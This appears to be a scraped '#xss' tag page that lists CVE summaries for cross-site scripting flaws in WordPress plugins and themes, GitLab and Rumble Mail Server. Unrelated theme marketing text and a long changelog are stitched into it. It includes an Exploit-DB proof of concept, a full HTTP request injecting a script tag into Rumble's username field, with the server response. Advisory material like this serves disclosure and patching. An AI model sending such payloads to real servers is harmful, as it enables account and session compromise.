Authenticated (subscriber or higher user role if allowed to access projects) Stored Cross-Site Scripting (XSS) vulnerability in weDevs WP Project Manager (WordPress plugin) versions <= 2.4.13.

CVE-2021-36826: WP Project Manager – Project, Task Management & Team Collaboration Software

Improper neutralization of user input in GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 allowed an attacker to exploit XSS by injecting HTML in notes.

GitLab 15.0 is launching on May 22! This version brings many exciting improvements, but also removes deprecated features and introduces **breaking changes** that may impact your workflow. To see what is being deprecated and removed, please visit Breaking changes in 15.0 and Deprecations.

*   ![](https://gitlab.com/uploads/-/system/group/avatar/9970/logo-extra-whitespace.png)GitLab.org
*   cves
*   **Repository**

CVE-2022-1175: 2022/CVE-2022-1175.json · master · GitLab.org / cves · GitLab

Hello everyone! In this episode, let’s take a look at the latest vulnerabilities in Gitlab. On March 31, the Critical Security Release for GitLab Community Edition (CE) and Enterprise Edition (EE) was released. GitLab recommends that all installations running a version affected by the issues described in the bulletin are upgraded to the latest version as soon […]

Gitlab OmniAuth Static Passwords and stored XSS

The FormBuilder WordPress plugin through 1.08 does not have CSRF checks in place when creating/updating and deleting forms, and does not sanitise as well as escape its form field values. As a result, attackers could make logged in admin update and delete arbitrary forms via a CSRF attack, and put Cross-Site Scripting payloads in them.

CVE-2022-0830

A Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the username parameter.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Exploit:
    POST /users HTTP/1.1
    Host: 127.0.0.1:2580
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 96
    Origin: http://127.0.0.1:2580
    Authorization: Basic YWRtaW46YWRtaW4=
    Connection: keep-alive
    Referer: http://127.0.0.1:2580/users
    Upgrade-Insecure-Requests: 1
    
    username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on a.com<br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
    
    
    <h1>RumbleLua users </h1>
    <p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
    Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
    while regular users can only
    see and edit the domains they have access to.
    </p>
    <table class="elements">
      <tr>
        <th>Create a new user:</th>
      </tr>
    <tr>
    <td>
    <form action="/users" method="post" name="makeuser">
    
      <div style="width: 300px; text-align:right; float: left;">
        <label for="username"><strong>Username:</strong></label>
        <input name="username" autocomplete="off" type="text" id="username" >
        <br>
        <label for="password"><strong>Password:</strong></label>
        <input type="password" autocomplete="off" name="password" id="password">
        <br />
        <label for="password"><strong>Access rights:</strong></label>
        <select name="rights" size="4" style="width: 150px;" multiple="multiple">
        <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
        <optgroup label="Domains:">
            </optgroup>
        </select>
          </div>
        <p><br /><br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    
          &nbsp;&nbsp;
          <input type="submit" name="submit" id="submit" value="Submit" />
        </p>
    
    </form>
    </td>
    </tr>
    </table>
    <table width="200" class="elements">
      <tr>
        <th>Username</th>
        <th>Rights</th>
        <th>Actions</th>
      </tr>
      <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
        <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
        <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
      </table>
    <p>&nbsp;</p>
    
    
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43462: Offensive Security’s Exploit Database Archive

In the Noo JobMonster WordPress theme before 4.5.2.9 JobMonster there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests.

CVE-2022-1170: Jobmonster - Job Board WordPress Theme

There is a XSS vulnerability in Careerfy.

CVE-2022-1169

There are unauthenticated reflected Cross-Site Scripting (XSS) vulnerabilities in CareerUp Careerup WordPress theme before 2.3.1, via the filter parameters.

CareerUp – Job Board WordPress theme is a complete Job Board WordPress theme that allows you to create a useful and easy to use job listings website . Using CareerUp theme, you can create a complete & fully Responsive job portal, career platform to run human resource management, recruitment or job posting website. CareerUp is not just a job board theme, it’s the best WordPress job portal template choice for anyone who wants a simple job script that makes money.

**Features**

*   **Restrict Job**  
    **\- View job page:**
    *   All (Users, Guests)
    *   All Register Users
    *   Register Candidates (All registered candidates can view jobs.)
    *   Always Hidden
*   **Restrict Candidate**  
    **\- View candidate page:**
    
    *   All (Users, Guests)
    *   All Register Users
    *   Only Applicants (Employer can view only their own applicants candidates.)
    *   Register Employers (All registered employers can view candidates.)
    *   Register Employers with package (Registered employers who purchased CV Package can view candidates.)
    
    **\- View candidate contact info:**
    *   All (Users, Guests)
    *   All Register Users
    *   Only Applicants (Employer can view only their own applicants candidates.)
    *   Register Employers (All registered employers can view candidates.)
    *   All users can view candidate, but only employers with package can see contact info (Users who purchased Contact Package can see contact info.)
*   **Restrict Employer**  
    **\- View candidate page:**
    
    *   All (Users, Guests)
    *   All Register Users
    *   Only Applicants (Candidate can view only their own applicants employers.)
    *   Register Candidates (All registered candidates can view employers.)
    *   Always Hidden
    
    **\- View candidate contact info:**
    *   All (Users, Guests)
    *   All Register Users
    *   Only Applicants (Candidate can view only their own applicants employers.)
    *   Register Candidates (All registered candidates can view employers.)
    *   Always Hidden
*   Add a job in frontend
*   Highly Customizable
*   Extensive Admin Interface
*   One click Demo Import
*   No coding knowledge required
*   Page Templates
*   Responsive & Retina Ready
*   Large collection of useful inner pages
*   Choose your grid size
*   Boxed layout option
*   Powerful typography options
*   Translation ready
*   WooCommerce compatible
*   Powerful sorting options for job listings and resumes
*   Multiple ways of showcasing job listings and resumes
*   Listing List shortcode
*   Listing Search shortcode
*   Listing Advanced Search shortcode
*   Listing Simple Search shortcode
*   Resume List shortcode
*   Resume Advanced Search shortcode
*   User login
*   User Dashboard page template
*   Facebook, Google, Twitter, LinkedIn login
*   Facebook, Google, Twitter, LinkedIn apply job
*   Pricing Tables shortcode
*   Comparison Pricing Tables shortcode
*   Smooth Page Transitions
*   Fontawsome & Flaticon
*   User Login Form

**Updates History:**

**Version 2.3.24 – 24 March 2022**

\* Update Elementor

**Version 2.3.23 – 05 November 2021**

\* Update register form

**Version 2.3.22 – 15 September 2021**

\* Update filter job

**Version 2.3.21 – 01 July 2021**

\* Update Website Preload

**Version 2.3.20 – 10 June 2021**

\* Updated select2

**Version 2.3.19 – 31 May 2021**

\* Updated employer logo default

**Version 2.3.18 – 14 May 2021**

\* Added Fields Manager

**Version 2.3.17 – 28 April 2021**

\* Updated Elementor

**Version 2.3.16 – 26 April 2021**

\* Updated Elementor

**Version 2.3.15 – 14 April 2021**

\* Updated WooCommerce
\* Updated Language

**Version 2.3.14 – 17 March 2021**

\* Updated related
\* Fixed pricing package

**Version 2.3.13 – 16 March 2021**

\* Updated pagination Jobs, Employers, Candidates

**Version 2.3.12 – 19 February 2021**

\* Improved responsive
\* Improved restrict Job, Employer, Candidate

**Version 2.3.11 – 15 January 2021**

\* Updated WooCommerce

**Version 2.3.10 – 03 November 2020**

\* Updated restrict jobs, candidate, employer
\* Updated application status

**Version 2.3.9 – 01 October 2020**

\* Updated get jobs by multiple taxonomies
\* Updated Job map
\* Updated Job preview

**Version 2.3.8 – 21 August 2020**

\* Updated candidate category list
\* Update them style

**Version 2.3.7 – 21 August 2020**

\* Updated WooCommerce 4.4

**Version 2.3.6 – 14 August 2020**

\* Fixed javascript error
\* Improve geolocation

**Version 2.3.5 – 12 August 2020**

\* Fixed javascript error
\* Updated demo import

**Version 2.3.4 – 05 August 2020**

\* Updated plugin "WP Job Board" 2.1.3
\* Updated search location
\* Updated Employer | Candidate email
\* Updated Employer my jobs

**Version 2.3.3 – 13 July 2020**

\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.2.2
\* Add element "Apus Jobs Maps" to show maps in home page

**Version 2.3.2 – 10 July 2020**

\* Updated plugin "WP Job Board" 2.1.2
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.2.1
\* Updated WooCommerce 4.3
\* Fixed Urgent/Featured jobs

**Version 2.3.1 – 18 June 2020**

\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.1.1
\* Updated filter url
\* Updated texts
\* Added update checker

**Version 2.3.0 – 29 May 2020**

\* Updated plugin "WP Job Board" 2.1.0
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.1.0
\* Updated job filter
\* Updated Resume package
\* Added job restrict
\* Added recaptcha for lost password form
\* Added ajax handles
\* Fixed send email alert (jobs, candidates)

**Version 2.2.2 – 26 May 2020**

\* Updated plugin "WP Job Board" 2.0.5
\* Updated mapbox
\* Fixed php error
\* Updated contact form
\* Updated candidate custom fields

**Version 2.2.1 – 06 May 2020**

\* Updated WooCommerce
\* Fixed filter location list

**Version 2.2.0 – 04 May 2020**

\* Updated plugin "WP Job Board" 2.0.3
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.0.3
\* Added 2 Home pages
\* Added 2 Job details page
\* Added 2 Employer page
\* Added 2 Candidate pages
\* Added 2 job listing style
\* Added option change color for Urgent, Featured job, employer, candidate
\* Added options for hidden Register form fields
\* Added job suggestion search
\* Updated filter results
\* Updated email template
\* Fixed social login

**Version 2.1.1 – 31 March 2020**

\* Updated rating review

**Version 2.1.0 – 30 March 2020**

\* Updated plugin "WP Job Board" 2.0.0
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.0.2
\* Add Employee for Employer
\* Add RSS Feed Jobs
\* Updated permalink
\* Updated phone display
\* Updated WooCommerce
\* Fixed facebook login

**Version 2.0.3 – 03 March 2020**

\* Updated plugin "WP Job Board" 1.3.2
\* Updated locations
\* Updated Filter count

**Version 2.0.2 – 29 February 2020**

\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.0.1
\* Fixed pricing package

**Version 2.0.1 – 27 February 2020**

\* Updated responsive
\* Updated demo import

**Version 2.0.0 – 27 February 2020**

\* Updated more 5 home page
\* Updated plugin "WP Job Board" 1.3.0
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.0.0
\* Updated location
\* Updated Elementor elements
\* Added candidate search form
\* Added field location list for Job search form
\* Added package with WooCommerce Subscription
\* Added filter by Employers

**Version 1.1.24 – 04 February 2020**

\* Updated plugin "WP Job Board" 1.2.24
\* Updated submit job preview
\* Updated responsive
\* Updated candidate filter location
\* Updated employer filter location
\* Fixed submit job preview

**Version 1.1.23 – 31 January 2020**

\* Updated plugin "WP Job Board" 1.2.23
\* Updated WooCommerce 3.9.0
\* Updated search form

**Version 1.1.22 – 20 December 2019**

\* Updated plugin "WP Job Board" 1.2.20
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 2.0.5
\* Added Approved for Application
\* Fixed Filter widgets Jobs, Employers, Candidates
\* Added taxonomy multiple select field
\* Added User search ajax fields
\* Added Employer view all jobs
\* Updated my jobs

**Version 1.1.21 – 12 December 2019**

\* Updated plugin "WP Job Board" 1.2.19
\* Updated Job Preview
\* Updated Menu class
\* Updated price format
\* Updated job expired

**Version 1.1.20 – 27 November 2019**

\* Updated plugin "WP Job Board" 1.2.18
\* Added sort by for packages
\* Updated candidate shortlist
\* Updated reset password

**Version 1.1.19 – 25 November 2019**

\* Updated plugin "WP Job Board" 1.2.17
\* Updated job simple search
\* Updated job expired date

**Version 1.1.18 – 21 November 2019**

\* Updated plugin "WP Job Board" 1.2.16
\* Updated search location
\* Updated filter
\* Updated custom field placeholder
\* Updated user approve

**Version 1.1.17 – 13 November 2019**

\* Updated plugin "WP Job Board" 1.2.15
\* Updated email apply
\* Updated Google Maps
\* Updated WooCommerce 3.8
\* Fixed Search Form Location

**Version 1.1.16 – 07 November 2019**

\* Updated plugin "WP Job Board" 1.2.14
\* Fixed submit job error

**Version 1.1.15 – 05 November 2019**

\* Updated plugin "WP Job Board" 1.2.13
\* Updated listing count
\* Updated breadcrumbs

**Version 1.1.14 – 21 October 2019**

\* Updated plugin "WP Job Board" 1.2.12
\* Updated job button style
\* Improved Job filter Widget
\* Improved Candidate filter Widget
\* Improved Employer filter Widget

**Version 1.1.13 – 9 October 2019**

\* Added translate Menu text
\* Added loading for reset password

**Version 1.1.12 – 27 September 2019**

\* Updated plugin "WP Job Board" 1.2.10
\* Updated Recaptcha
\* Update contact form email template
\* Added filter taxonomies

**Version 1.1.11 – 16 September 2019**

\* Updated plugin "WP Job Board" 1.2.9
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 2.0.3
\* Updated clear location
\* Update submit form

**Version 1.1.10 – 13 September 2019**

\* Updated plugin "WP Job Board" 1.2.8
\* Added placeholder image
\* Fixed filter Employer/Candidate
\* Fixed Pagination
\* Updated ajax filter
\* Updated social share
\* Updated Email variable
\* Updated Linkedin login
\* Updated submit form

**Version 1.1.9 – 30 August 2019**

\* Updated plugin "WP Job Board" 1.2.7
\* Added candidate tags
\* Fixed custom field
\* Add Google Structure data
\* Fixed candidate salary types
\* Fixed Translate

**Version 1.1.8 – 23 August 2019**

\* Updated plugin "WP Job Board" 1.2.6
\* Updated date field
\* Added email template for apply job
\* Add page settings for after login
\* Add relist expired job
\* Fixed apply job with complete resume
\* Fixed Salary format

**Version 1.1.7 – 13 August 2019**

\* Updated plugin "WP Job Board" 1.2.3
\* Added Undo reject applicant
\* Updated WooComemrce 3.7
\* Updated spelling

**Version 1.1.6 – 12 August 2019**

\* Updated plugin "WP Job Board" 1.2.3
\* Updated location search
\* Updated maps default location

**Version 1.1.5 – 10 August 2019**

\* Updated plugin "WP Job Board" 1.2.2
\* Added employer restrict review
\* Added candidate restrict review
\* Update date format
\* Added Terms and Conditions

**Version 1.1.4 – 08 August 2019**

\* Updated plugin "WP Job Board" 1.2.0
\* Compatible with WPML
\* Improved responsive
\* Updated profile url field

**Version 1.1.3 – 07 August 2019**

\* Added simple jobs widget
\* Added simple candidates widget
\* Added simple employers widget
\* Added editable profile url
\* Added Apply job with complete resume

**Version 1.1.2 – 02 August 2019**

\* Added video for candidate/employer
\* Added popup image for candidate portfolio
\* Updated plugin "WP Job Board" 1.1.2

**Version 1.1.1 – 01 August 2019**

\* Updated download CV
\* Fixed error with old version WP Job Board
\* Fixed filter in job List v3

**Version 1.1.0 – 31 July 2019**

\* Compatible with WP Job Manager 1.1.0
\* Fixed indeed job import
\* Added restrict employer
\* Added restrict candidate
\* Added approve user register
\* Added approve resume
\* Added Resume download
\* Added changeable Miles/Kilometer
\* Added Free/paid apply for candidate
\* Added CV package
\* Added Contact candidate package
\* Added Resume package
\* Added Candidate package
\* Fixed Job package expiry date
\* Fixed error with WooCommerce 3.x

**Version 1.0.10 – 18 July 2019**

\* Fixed job tabs
\* Updated plugin "WP Job Board" version 1.0.13

**Version 1.0.9 – 16 July 2019**

\* Update register user
\* Update plugin "WP Job Board" to version 1.0.12

**Version 1.0.8 – 12 July 2019**

\* Updated import demo data

**Version 1.0.7 – 12 July 2019**

\* Updated Spelling text
\* Updated plugin "WP Job Board" version 1.0.11
\* Fixed search by jobs, employer, candidate
\* Fixed filter candidate

**Version 1.0.6 – 11 July 2019**

\* Updated plugin "Wp Job Board" to version 1.0.10
\* Updated expired job
\* Updated messages system
\* Updated demo import

**Version 1.0.5 – 09 July 2019**

\* Updated plugin "Wp Job Board" to version 1.0.9
\* Updated filter for jobs/candidate shortlist
\* Updated filter for following
\* Updated filter for applicants
\* Updated Applicants page
\* Added reject applicant
\* Added filter count
\* Fixed expired job
\* Improved filter jobs/candidate/employer

**Version 1.0.4 – 05 July 2019**

\* Added filter count
\* Improved filter job
\* Updated plugin "WP Job Board" to version 1.0.4

**Version 1.0.3 – 02 July 2019**

\* Fixed responsive sidebar

**Version 1.0.2 – 28 June 2019**

\* Fixed job style
\* Fixed job tabs layout
\* Fixed Register user
\* Improved urgent label style
\* Improved import demo data
\* Add change header mobile color

**Version 1.0.1 – 26 June 2019**

\* Updated demo data
\* Improve header style

**Version 1.0.0 – 25 June 2019**

\* First release

CVE-2022-1167: CareerUp - Job Board WordPress Theme

The Wyzi Theme was affected by reflected XSS vulnerabilities in the business search feature

CVE-2022-1164

The UpdraftPlus WordPress Backup Plugin WordPress plugin before 1.22.9 does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.

Tag

#xss